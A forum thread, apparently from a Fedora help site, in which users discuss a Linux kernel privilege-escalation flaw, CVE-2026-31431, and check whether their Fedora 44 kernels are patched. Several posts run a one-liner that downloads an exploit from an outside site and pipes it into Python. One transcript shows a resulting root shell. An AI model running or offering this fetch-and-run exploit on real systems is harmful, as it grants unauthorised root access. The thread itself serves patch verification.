Around a day ago a 0-day popped up for essentially all distros with post-2017 versions, including Fedora. I’d like to inquire about the status of the response to it.
Did you bother to search for the CVE number in this forum first?
The patch for CVE-2026-31431 was merged to the mainline kernel about a month ago, and any stable version released after that is safe (specifically, 6.18.22+, 6.19.12+ and all versions after 7.0). Your computer is safe as long as you are keeping pace with the latest kernel release in the Fedora repository, and you can always verify that with the published PoC.
Turns out, no
Do I have brain damage?
dnf update --security did not identify the need to upgrade the kernel in my case, so definitely check the actual installed and running kernel version.
curl https://copy.fail/exp | python3 && su
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
0 0 0 0 0 0 0 0 --:--:-- --:--:-- --:--:--100 731 0 731 0 0 1721 0 --:--:-- --:--:-- --:--:-- 1724
Password:
su: Authentication failure
Password:
su: Authentication failure
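A version check along the lines suggested above, as an added example that is not part of any post in this thread: it compares the running kernel against the fixed releases named here (6.18.22+, 6.19.12+, 7.0 onward) and, on RPM systems, reports when the newest installed kernel is not the one that is booted. The function names are assumptions, and kernel series the thread does not mention are reported as unknown rather than guessed.

```shell
#!/bin/sh
# Thresholds are the fixed releases named in this thread for CVE-2026-31431:
# 6.18.22+, 6.19.12+, and 7.0 onward. Other series are reported as "unknown".

# kernel_status VERSION -> prints fixed | vulnerable | unknown
kernel_status() {
    base=${1%%-*}                       # 6.19.14-300.fc44.x86_64 -> 6.19.14
    case "$base" in
        *[!0-9.]*|.*|*..*|*.) echo unknown; return 0 ;;   # malformed
        *.*) ;;                                            # has major.minor
        *) echo unknown; return 0 ;;
    esac
    major=${base%%.*}
    rest=${base#*.}
    minor=${rest%%.*}
    patch=${rest#*.}
    if [ "$patch" = "$rest" ]; then patch=0; fi   # "7.0" has no patch part
    patch=${patch%%.*}
    if [ "$major" -ge 7 ]; then
        echo fixed
    elif [ "$major" -eq 6 ] && [ "$minor" -eq 19 ]; then
        if [ "$patch" -ge 12 ]; then echo fixed; else echo vulnerable; fi
    elif [ "$major" -eq 6 ] && [ "$minor" -eq 18 ]; then
        if [ "$patch" -ge 22 ]; then echo fixed; else echo vulnerable; fi
    else
        echo unknown                    # series not covered by the thread
    fi
}

# Newest kernel-core package on disk, in the same form as `uname -r`.
newest_installed_kernel() {
    command -v rpm >/dev/null 2>&1 || return 1
    out=$(rpm -q kernel-core --qf '%{VERSION}-%{RELEASE}.%{ARCH}\n' 2>/dev/null) || return 1
    printf '%s\n' "$out" | sort -V | tail -n 1
}

running=$(uname -r)
echo "running kernel $running: $(kernel_status "$running")"
if newest=$(newest_installed_kernel); then
    echo "newest installed kernel $newest: $(kernel_status "$newest")"
    if [ "$newest" != "$running" ]; then
        echo "running kernel differs from newest installed; reboot to use it"
    fi
fi
```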
Still no fix for this vulnerability in f44.
sergey@win7:~/work/dirtyfrag$ cat /etc/os-release
NAME="Fedora Linux"
VERSION="44 (Workstation Edition)"
RELEASE_TYPE=stable
ID=fedora
VERSION_ID=44
VERSION_CODENAME=""
PRETTY_NAME="Fedora Linux 44 (Workstation Edition)"
ANSI_COLOR="0;38;2;60;110;180"
LOGO=fedora-logo-icon
CPE_NAME="cpe:/o:fedoraproject:fedora:44"
DEFAULT_HOSTNAME="fedora"
HOME_URL="https://fedoraproject.org/"
DOCUMENTATION_URL="https://docs.fedoraproject.org/en-US/fedora/f44/"
SUPPORT_URL="https://ask.fedoraproject.org/"
BUG_REPORT_URL="https://bugzilla.redhat.com/"
REDHAT_BUGZILLA_PRODUCT="Fedora"
REDHAT_BUGZILLA_PRODUCT_VERSION=44
REDHAT_SUPPORT_PRODUCT="Fedora"
REDHAT_SUPPORT_PRODUCT_VERSION=44
SUPPORT_END=2027-05-19
VARIANT="Workstation Edition"
VARIANT_ID=workstation
sergey@win7:~/work/dirtyfrag$ uname -r
6.19.14-300.fc44.x86_64
sergey@win7:~/work/dirtyfrag$ sudo dnf upgrade --refresh
[sudo] password for sergey:
Updating and loading repositories:
Fedora 44 - x86_64 - Updates 100% | 1.6 KiB/s | 5.7 KiB | 00m04s
RPM Fusion for Fedora 44 - Nonfree - Updates 100% | 2.7 KiB/s | 8.3 KiB | 00m03s
RPM Fusion for Fedora 44 - Nonfree - Steam 100% | 3.3 KiB/s | 8.3 KiB | 00m03s
RPM Fusion for Fedora 44 - Nonfree 100% | 4.5 KiB/s | 9.0 KiB | 00m02s
RPM Fusion for Fedora 44 - Free - Updates 100% | 5.5 KiB/s | 8.2 KiB | 00m01s
RPM Fusion for Fedora 44 - Free 100% | 6.8 KiB/s | 8.9 KiB | 00m01s
Fedora 44 - hardware:razer 100% | 7.8 KiB/s | 1.6 KiB | 00m00s
google-chrome 100% | 6.3 KiB/s | 1.3 KiB | 00m00s
Fedora 44 - x86_64 100% | 15.7 KiB/s | 12.3 KiB | 00m01s
Visual Studio Code 100% | 7.3 KiB/s | 1.5 KiB | 00m00s
Repositories loaded.
Problem 1: cannot install the best update candidate for package mesa-va-drivers-freeworld-26.0.3-1.fc44.x86_64
- nothing provides mesa-filesystem(x86-64) = 26.0.6 needed by mesa-va-drivers-freeworld-26.0.6-1.fc44.x86_64 from rpmfusion-free-updates
Problem 2: problem with installed package
- installed package mesa-va-drivers-freeworld-26.0.3-1.fc44.x86_64 requires mesa-filesystem(x86-64) = 26.0.3, but none of the providers can be installed
- package mesa-va-drivers-freeworld-26.0.3-1.fc44.x86_64 from rpmfusion-free requires mesa-filesystem(x86-64) = 26.0.3, but none of the providers can be installed
- cannot install both mesa-filesystem-26.0.5-3.fc44.x86_64 from updates and mesa-filesystem-26.0.3-4.fc44.x86_64 from @System
- cannot install both mesa-filesystem-26.0.5-3.fc44.x86_64 from updates and mesa-filesystem-26.0.3-4.fc44.x86_64 from fedora
- cannot install the best update candidate for package mesa-filesystem-26.0.3-4.fc44.x86_64
- nothing provides mesa-filesystem(x86-64) = 26.0.6 needed by mesa-va-drivers-freeworld-26.0.6-1.fc44.x86_64 from rpmfusion-free-updates
Package Arch Version Repository Size
Skipping packages with conflicts:
mesa-filesystem x86_64 26.0.5-3.fc44 updates 3.6 KiB
Skipping packages with broken dependencies:
mesa-va-drivers-freeworld x86_64 26.0.6-1.fc44 rpmfusion-free-updates 51.0 MiB
mesa-va-drivers-freeworld x86_64 26.0.3-1.fc44 rpmfusion-free 51.0 MiB
Nothing to do.
sergey@win7:~/work/dirtyfrag$ curl https://copy.fail/exp | python3 && su
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 731 0 731 0 0 3452 0 0
[root@win7 dirtyfrag]# id
uid=0(root) gid=0(root) groups=0(root) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
[root@win7 dirtyfrag]#
Cannot reproduce on my pc.
~/projects
% uname -a
Linux SolarFedora 6.19.14-300.fc44.x86_64 #1 SMP PREEMPT_DYNAMIC Thu Apr 23 15:17:50 UTC 2026 x86_64 GNU/Linux
~/projects
% curl https://copy.fail/exp | python3 && su
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 731 0 731 0 0 658 0 00:01 667
Password: su: Authentication failure
Password:
su: Authentication failure
You won’t see any mention in the kernel changelogs, as upstream fixed it in 6.19.12 and 7.0.
Hm. My bad. It was leftovers from the “dirty frag” exploit. The su binary didn’t ask for a password at all. Flushing the page cache fixed the issue.